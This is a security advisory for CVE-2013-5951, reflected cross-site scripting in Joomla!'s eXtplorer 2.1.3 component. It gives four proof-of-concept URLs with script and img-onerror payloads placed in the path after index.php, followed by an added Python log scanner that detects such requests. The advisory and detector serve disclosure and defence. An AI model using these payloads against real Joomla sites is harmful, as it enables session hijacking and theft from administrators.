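CVE ID: CVE-2013-5951
Joomla! is a content management system that is quite well known abroad.
Multiple scripts in the Joomla! eXtplorer component do not properly filter user-supplied input, allowing remote attackers to conduct cross-site scripting attacks, which can be used to obtain sensitive information or hijack user sessions.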
Joomla! eXtplorer 2.1.3
No detailed solution is currently available:
http://www.joomla.org/
http://www.example.com/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component
http://www.example.com/administrator/index.php<img src=x:alert(alt) onerror=eval(src) alt=XSS>?option=com_extplorer&tmpl=component&action=post&do_action=admin
http://www.example.com/administrator/index.php/<img src=x onerror=alert('XSS') >?option=com_extplorer&tmpl=component&action=post&do_action=copy
http://www.example.com/administrator/index.php/<img src=x:alert(alt) onerror=eval(src) alt=XSS>?option=com_extplorer&tmpl=component&action=upload
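In every URL listed above, the markup sits in the path after index.php rather than in a query parameter, so log review that inspects only parameter values will not see it. The following is an added example, not part of the original advisory: a log check that flags com_extplorer requests with HTML metacharacters after index.php. The combined access-log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let trailing path data break out of an HTML attribute or tag.
HTML_META = re.compile(r'[<>"\']')
MARKER = "/administrator/index.php"  # entry point used in the advisory's URLs

def decode_fully(value, rounds=3):
    """Percent-decode until stable so the check sees what the page would echo."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_extplorer_request(target):
    """True if markup characters follow index.php in a com_extplorer request."""
    path, _, query = target.partition("?")
    if parse_qs(query).get("option", [""])[0].lower() != "com_extplorer":
        return False
    path = decode_fully(path)
    pos = path.lower().find(MARKER)
    if pos < 0:
        return False
    return bool(HTML_META.search(path[pos + len(MARKER):]))

def scan(log_lines):
    """Return the request targets of flagged log lines."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and suspicious_extplorer_request(m.group(1)):
            hits.append(m.group(1))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2014:10:00:00 +0000] "GET /administrator/index.php?option=com_extplorer&tmpl=component HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2014:10:00:05 +0000] "GET /administrator/index.php/%22%3E%3C/script%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E?option=com_extplorer&tmpl=component HTTP/1.1" 200 5300',
    '192.0.2.12 - - [01/Jan/2014:10:00:09 +0000] "GET /administrator/index.php%3Cimg%20src=x%3E?option=com_extplorer&tmpl=component&action=upload HTTP/1.1" 200 5300',
    '192.0.2.13 - - [01/Jan/2014:10:00:12 +0000] "GET /administrator/index.php/%3Cb%3E?option=com_content HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("flagged:", hit)
```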